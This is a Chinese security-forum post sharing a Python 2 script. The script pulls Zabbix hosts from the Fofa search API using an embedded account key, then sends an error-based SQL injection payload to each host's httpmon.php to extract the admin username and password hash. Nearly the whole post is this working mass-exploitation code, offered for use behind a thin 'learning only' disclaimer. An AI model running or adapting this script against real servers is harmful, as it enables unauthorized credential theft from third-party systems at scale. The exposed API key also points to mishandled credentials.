HanDs
管理员

Fofa搜索结果采集及漏洞利用小脚本 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

看到有小伙伴问fofa搜索结果采集的问题 
http://zone.wooyun.org/content/17971 

贴上之前写过的一个简单的采集加利用,代码效率特别低,就抛砖引玉一下! 

fofa在不登录状态下默认只展示一部分搜索结果,可以利用它提供的api接口来获取所有的搜索结果。用户名+对应key的形式。 

代码是搜索  title=zabbix,并对获取的结果进行zabbix注入漏洞的利用,最终打印出存在漏洞的URL和密码md5. 

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#coding:utf-8
 
import urllib2,urllib,cookielib
import re,sys
import base64
import os,json
 
def vulwebsearch(keywords):
    vulhostlist=[]
    urlenkeywords=urllib2.quote(keywords)
    searchurl="http://fofa.so/api/result?qbase64="+base64.b64encode(keywords)+"&key=d69f306296e8ca95fded42970400ad23&[email protected]"
    req=urllib2.urlopen(searchurl)
    restring=req.read()
    restring=json.loads(restring)
    zabbixsqli(restring['results'])
        
def zabbixsqli(vulhostlist):
    for vulhost in vulhostlist:
        if not vulhost.startswith('http'):
            vulhost="http://"+vulhost
        zabbix_url=vulhost  
        try:
            payload="""/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"""
              
            content=urllib.urlopen(zabbix_url)  
            if content.getcode()==200:
                fzadminmd5_url=zabbix_url+payload
                req=urllib2.urlopen(fzadminmd5_url)
                html=req.read()
                adminmd5=re.findall("\~.*\~\~",html)
                if len(adminmd5)==1:
                    print zabbix_url,adminmd5
            #zabbixweakpass(zabbix_url)  
        except:
            pass
          
if __name__=="__main__":
      
    if len(sys.argv)!=2:
        print "Usage:"+"python"+" fofa_zabbix.py "+"keywords"
        print "example:"+"python fofa_zabbix.py title=zabbix"
        sys.exit()
    else:
        vulwebsearch(sys.argv[1])

如图:
Fofa搜索结果采集及漏洞利用小脚本 - 第1张  | 阿德马Web安全

 

 



学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Fofa 搜索结果采集及漏洞利用小脚本
#1楼
发帖时间:2016-8-8   |   查看数:0   |   回复数:0
游客组
快速回复